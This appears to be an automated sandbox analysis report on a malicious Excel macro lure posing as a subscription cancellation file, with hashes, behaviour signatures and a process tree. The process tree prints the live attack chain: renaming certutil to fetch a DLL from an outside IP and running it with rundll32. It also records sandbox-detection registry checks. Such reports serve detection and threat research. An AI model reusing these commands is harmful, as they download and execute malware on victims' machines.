cancel_sub_VCP1234567890123.xlsb

General

Target: cancel_sub_VCP1234567890123.xlsb
Filesize: 123KB
Completed: 02-08-2021 09:36
Score: 10/10
MD5: 9e1ee4a42c381eabcf2cde38a1aae7c9
SHA1: 015bb306d9e54001d433b3ac2e7212b864f54ae2
SHA256: fd71a2fcc0b5dd0fb0dbff257839b67749f2cadf30e2d3dae7f0e941d93d24d3

Malware Config

Extracted
Language: xlm4.0
Source

Signatures 7

Discovery
  • Process spawned unexpected child process
    cmd.exe

    Description

    This typically indicates the parent process was compromised via an exploit or macro.

    Reported IOCs

    | description | pid | pid_target | process | target process |
    |---|---|---|---|---|
    | Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 1540 | 3128 | cmd.exe | EXCEL.EXE |
    | Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 636 | 3128 | cmd.exe | EXCEL.EXE |
  • Executes dropped EXE
    TTObk2.exe

    Reported IOCs

    | pid | process |
    |---|---|
    | 2264 | TTObk2.exe |
  • Checks processor information in registry
    EXCEL.EXE

    Description

    Processor information is often read in order to detect sandboxing environments.

    TTPs

    Query Registry, System Information Discovery

    Reported IOCs

    | description | ioc | process |
    |---|---|---|
    | Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE |
    | Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE |
    | Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE |
  • Enumerates system info in registry
    EXCEL.EXE

    TTPs

    Query Registry, System Information Discovery

    Reported IOCs

    | description | ioc | process |
    |---|---|---|
    | Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE |
    | Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE |
    | Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE |
  • Suspicious behavior: AddClipboardFormatListener
    EXCEL.EXE

    Reported IOCs

    | pid | process |
    |---|---|
    | 3128 | EXCEL.EXE |
  • Suspicious use of SetWindowsHookEx
    EXCEL.EXE

    Reported IOCs

    | pid | process |
    |---|---|
    | 3128 | EXCEL.EXE |
    | 3128 | EXCEL.EXE |
    | 3128 | EXCEL.EXE |
    | 3128 | EXCEL.EXE |
    | 3128 | EXCEL.EXE |
    | 3128 | EXCEL.EXE |
    | 3128 | EXCEL.EXE |
    | 3128 | EXCEL.EXE |
    | 3128 | EXCEL.EXE |
    | 3128 | EXCEL.EXE |
    | 3128 | EXCEL.EXE |
    | 3128 | EXCEL.EXE |
  • Suspicious use of WriteProcessMemory
    EXCEL.EXE, cmd.exe

    Reported IOCs

    | description | pid | process | target process |
    |---|---|---|---|
    | PID 3128 wrote to memory of 1540 | 3128 | EXCEL.EXE | cmd.exe |
    | PID 3128 wrote to memory of 1540 | 3128 | EXCEL.EXE | cmd.exe |
    | PID 3128 wrote to memory of 2264 | 3128 | EXCEL.EXE | TTObk2.exe |
    | PID 3128 wrote to memory of 2264 | 3128 | EXCEL.EXE | TTObk2.exe |
    | PID 3128 wrote to memory of 636 | 3128 | EXCEL.EXE | cmd.exe |
    | PID 3128 wrote to memory of 636 | 3128 | EXCEL.EXE | cmd.exe |
    | PID 636 wrote to memory of 2168 | 636 | cmd.exe | rundll32.exe |
    | PID 636 wrote to memory of 2168 | 636 | cmd.exe | rundll32.exe |
Processes 5
  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\cancel_sub_VCP1234567890123.xlsb"
    Checks processor information in registry
    Enumerates system info in registry
    Suspicious behavior: AddClipboardFormatListener
    Suspicious use of SetWindowsHookEx
    Suspicious use of WriteProcessMemory
    PID:3128
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c mkdir %programdata%\TTObk2 && copy /b %SystemRoot%\System32\certutil.exe %programdata%\TTObk2\TTObk2.exe
      Process spawned unexpected child process
      PID:1540
    • C:\programdata\TTObk2\TTObk2.exe
      "C:\programdata\TTObk2\TTObk2.exe" -urlcache -f -split http://195.123.235.51 c:\programdata\TTObk2\TTObk2.dll
      Executes dropped EXE
      PID:2264
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c rundll32 %programdata%\TTObk2\TTObk2.dll,StartW
      Process spawned unexpected child process
      Suspicious use of WriteProcessMemory
      PID:636
      • C:\Windows\system32\rundll32.exe
        rundll32 C:\ProgramData\TTObk2\TTObk2.dll,StartW
        PID:2168
Network
Downloads
  • C:\ProgramData\TTObk2\TTObk2.exe
    MD5: 056c7d065f4622da9cc2848f47e2bae2
    SHA1: 6c6f18b0ec53dc63488961c4240ec584ac71c25f
    SHA256: e09a2d7ecac1a10c89e27750a18790da06ddd7311965dbc9ab6096f636dae61c
    SHA512: db158c9b669a2668149caf30df32595a488dcc831d7518ca2e793eac0885492a2eaee838914e706a585b7f3f1c801e299c697b2cec509204561bb098e16253d5
  • C:\programdata\TTObk2\TTObk2.exe
    MD5: 056c7d065f4622da9cc2848f47e2bae2
    SHA1: 6c6f18b0ec53dc63488961c4240ec584ac71c25f
    SHA256: e09a2d7ecac1a10c89e27750a18790da06ddd7311965dbc9ab6096f636dae61c
    SHA512: db158c9b669a2668149caf30df32595a488dcc831d7518ca2e793eac0885492a2eaee838914e706a585b7f3f1c801e299c697b2cec509204561bb098e16253d5
  • memory/636-276-0x0000000000000000-mapping.dmp
  • memory/1540-264-0x0000000000000000-mapping.dmp
  • memory/2168-277-0x0000000000000000-mapping.dmp
  • memory/2264-274-0x0000000000000000-mapping.dmp
  • memory/3128-123-0x00007FFA8F4D0000-0x00007FFA913C5000-memory.dmp
  • memory/3128-122-0x00007FFA913D0000-0x00007FFA924BE000-memory.dmp
  • memory/3128-121-0x00007FFA70CE0000-0x00007FFA70CF0000-memory.dmp
  • memory/3128-118-0x00007FFA70CE0000-0x00007FFA70CF0000-memory.dmp
  • memory/3128-117-0x00007FFA70CE0000-0x00007FFA70CF0000-memory.dmp
  • memory/3128-116-0x00007FFA70CE0000-0x00007FFA70CF0000-memory.dmp
  • memory/3128-115-0x00007FFA70CE0000-0x00007FFA70CF0000-memory.dmp
  • memory/3128-114-0x00007FF7AA140000-0x00007FF7AD6F6000-memory.dmp